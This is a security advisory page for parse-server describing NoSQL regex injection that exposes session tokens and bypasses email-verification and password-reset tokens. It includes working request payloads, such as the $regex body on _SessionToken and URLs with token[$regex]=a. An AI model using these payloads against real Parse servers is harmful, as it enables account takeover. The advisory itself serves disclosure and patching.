Loading HuntDB...

GHSA-h4mf-75hf-67w4

GitHub Security Advisory

Information disclosure in parse-server

✓ GitHub Reviewed HIGH Has CVE

Advisory Details

1. you can fetch all the users' objects, by using regex in the NoSQL query.
Using the NoSQL, you can use a regex on sessionToken `("_SessionToken":{"$regex":"r:027f"}}` and find valid accounts this way.

Using this method, it's possible to retrieve accounts without interaction from the users.

GET /parse/users/me HTTP/1.1
```
{
"_ApplicationId": "appName",
"_JavaScriptKey": "javascriptkey",
"_ClientVersion": "js2.10.0",
"_InstallationId": "ca713ee2-6e60-d023-a8fe-14e1bfb2f300",
"_SessionToken": {
"$regex": "r:5"
}
}
```
When trying it with an update query the same thing luckily doesn't seem to work:
POST /parse/classes/_User/PPNk59jPPZ

2. There is another similar vulnerability in verify email and the request password reset.

If you sign up with someone else's email address, you can simply use regex in the token param to verify the account: `http://localhost:1337/parse/apps/kickbox/verify_email?token[$regex]=a&[email protected]`

The same thing can be done for reset password: `http://localhost:1337/parse/apps/kickbox/request_password_reset?token[$regex]=a&[email protected]`

You may need to do it a few times with a different letter/number, but as long as the tokens contain the character it will succeed.

Affected Packages

npm parse-server
Affected versions: 0 (fixed in 4.1.0)

Related CVEs

Key Information

GHSA ID
GHSA-h4mf-75hf-67w4
Published
March 4, 2020 8:20 PM
Last Modified
January 8, 2021 8:27 PM
CVSS Score
7.5 /10
Primary Ecosystem
npm
Primary Package
parse-server
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 7, 2025 6:28 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.